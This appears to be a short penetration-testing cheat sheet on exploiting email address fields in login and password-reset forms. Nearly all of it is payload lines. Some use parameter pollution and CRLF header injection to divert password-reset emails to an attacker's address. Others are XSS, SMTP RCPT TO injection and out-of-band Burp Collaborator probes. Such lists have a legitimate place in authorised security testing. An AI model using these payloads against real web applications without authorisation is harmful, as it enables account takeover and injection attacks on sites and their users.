Email Address Forms
How to exploit login and forgotten password forms.
Email Address Form Payloads
The following payloads can be used when attempting to exploit an email address form
Param Manipulation and CRLF Injection
Use these payloads to try and force the web application to send legitimate password reset emails and such, to a email address you control:
email=user@lol.com&test@test.com
email=user@lol.com%26test@test.com
email=user@lol.com;test@test.com
email=user@lol.com, test@test.com
{”email”:”user@lol.com”,”test@test.com”}
{”email”:[”user@lol.com”,”test@test.com”]}
email=user@lol.com%0D%0ABcc:test@test.com
email=user@lol.com%0ABcc:test@test.com
email=user@lol.com%0DBcc:test@test.com
email=user@lol.com\r\nBcc:test@test.com
email=user@lol.com\nBcc:test@test.com
email=user@lol.com\rBcc:test@test.com
Other checks (XSS, SSRF, SMTP Manipulation)
Use these payloads (which are all valid email addresses according to the RFC) to find other issues.
<svg/onload=alert('XSS')>@test.com
test@test(<svg/onload=alert('XSS')>).com
"<svg/onload=alert('XSS')>"@test.com
"test@gmail.com\r\nRCPT TO:<victim+"@test.com>
test@burpcollab.com
test@[burpcollab.com]
Last updated